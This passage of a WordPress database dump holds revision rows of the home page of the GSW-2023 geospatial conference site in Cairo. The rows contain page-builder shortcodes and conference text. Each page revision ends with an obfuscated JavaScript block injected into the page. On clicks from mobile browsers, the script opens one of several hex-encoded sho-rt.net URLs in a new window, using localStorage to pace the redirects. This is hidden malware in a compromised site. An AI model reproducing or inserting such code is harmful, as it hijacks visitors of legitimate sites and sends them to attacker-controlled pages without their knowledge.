_0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 17:32:51','2022-11-09 17:32:51','',3066,'https://gsw2023.com/?p=3172',0,'revision','',0),
(3173,1,'2022-11-09 17:35:40','2022-11-09 17:35:40','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3><strong> EGYPT GSW\'2023</strong></h3>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 17:35:40','2022-11-09 17:35:40','',3066,'https://gsw2023.com/?p=3173',0,'revision','',0),
(3174,1,'2022-11-09 17:48:31','2022-11-09 17:48:31','','mlogo-11','','inherit','open','closed','','mlogo-11','','','2022-11-09 17:48:31','2022-11-09 17:48:31','',0,'https://gsw2023.com/wp-content/uploads/2022/11/mlogo-11.jpg',0,'attachment','image/jpeg',0),
(3175,1,'2022-11-09 17:57:07','2022-11-09 17:57:07','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3><strong> EGYPT GSW\'2023</strong></h3>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 